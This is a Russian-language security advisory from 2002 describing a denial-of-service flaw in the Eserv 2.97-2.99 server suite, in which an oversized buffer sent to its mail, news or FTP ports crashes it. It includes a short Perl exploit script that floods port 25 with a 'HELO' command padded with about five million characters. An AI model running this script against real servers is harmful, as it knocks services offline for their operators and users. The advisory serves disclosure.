DoS против Eserv
| Дата публикации: | 18.12.2002 |
| Всего просмотров: | 1223 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Eserv – Mail, News, Web, FTP и прокси сервер для Win95/98/NT/2000 (www.eserv.ru).
Чрезмерно большой буфер (более 5Мб) данных, переданный к 119, 25, 110 или 21 порту приведет к аварийному завершению работы программы. Эксплоит:
#!/usr/bin/perl -w
#greetz: marocit
#tool Eserv_dos.pl
use IO::Socket;
$buffer = "A"x 5080000 ;
$hel = "HELO "
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV [0]" } print
$connect "$hel$buffer"; print "\nsending exploit......\n\n";
уязвимость обнаружена в Eserv 2.97-2.99 (возможно и в более ранних версиях программы)
|